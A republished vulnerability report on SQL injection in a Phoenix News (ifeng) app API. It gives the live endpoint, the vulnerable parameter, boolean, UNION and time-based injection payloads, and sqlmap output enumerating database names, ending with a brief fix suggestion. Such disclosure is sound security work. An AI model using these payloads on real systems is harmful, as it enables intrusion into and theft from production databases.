Rumah > pangkalan data > tutorial mysql > 凤凰网某应用sql注入漏洞_MySQL

凤凰网某应用sql注入漏洞_MySQL

WBOY
Lepaskan: 2016-05-31 08:47:13
asal
1057 orang telah melayarinya

凤凰网某应用sql注入漏洞

凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞。

注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews&os=android_19&screen=720x1206&publishid=2011&zip=1,受影响参数:proid

证明:

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '12'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回正常数据

http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2.0&proid=ifengnews' and '22'='12&os=android_19&screen=720x1206&publishid=2011&zip=1 返回数据异常

 

sqlmap无压力,貌似凤凰汽车频道的库也在其中,

sqlmap identified the following injection points with a total of 50 HTTP(s) requests:

---

Place: GET

Parameter: proid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: gv=4.2.0&proid=ifengnews' AND 8025=8025 AND 'lqID'='lqID&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: gv=4.2.0&proid=-6406' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7166717471,0x457a716d67506d734978,0x716d696471),NULL,NULL,NULL,NULL,NULL#&os=android_19&screen=720x1206&publishid=2011&zip=1

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: gv=4.2.0&proid=ifengnews' AND SLEEP(5) AND 'tWlX'='tWlX&os=android_19&screen=720x1206&publishid=2011&zip=1

---

[09:36:11] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

[09:36:11] [INFO] fetching database names

[09:36:11] [INFO] the SQL query used returns 5 entries

[09:36:11] [INFO] retrieved: "information_schema"

[09:36:11] [INFO] retrieved: "auto_ifeng"

[09:36:11] [INFO] retrieved: "auto_ifeng_2"

[09:36:11] [INFO] retrieved: "mobile_ifeng"

[09:36:12] [INFO] retrieved: "test"

available databases [5]:

[*] auto_ifeng

[*] auto_ifeng_2

[*] information_schema

[*] mobile_ifeng

[*] test

 

修复方案:

过滤,参数化

sumber:php.cn
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan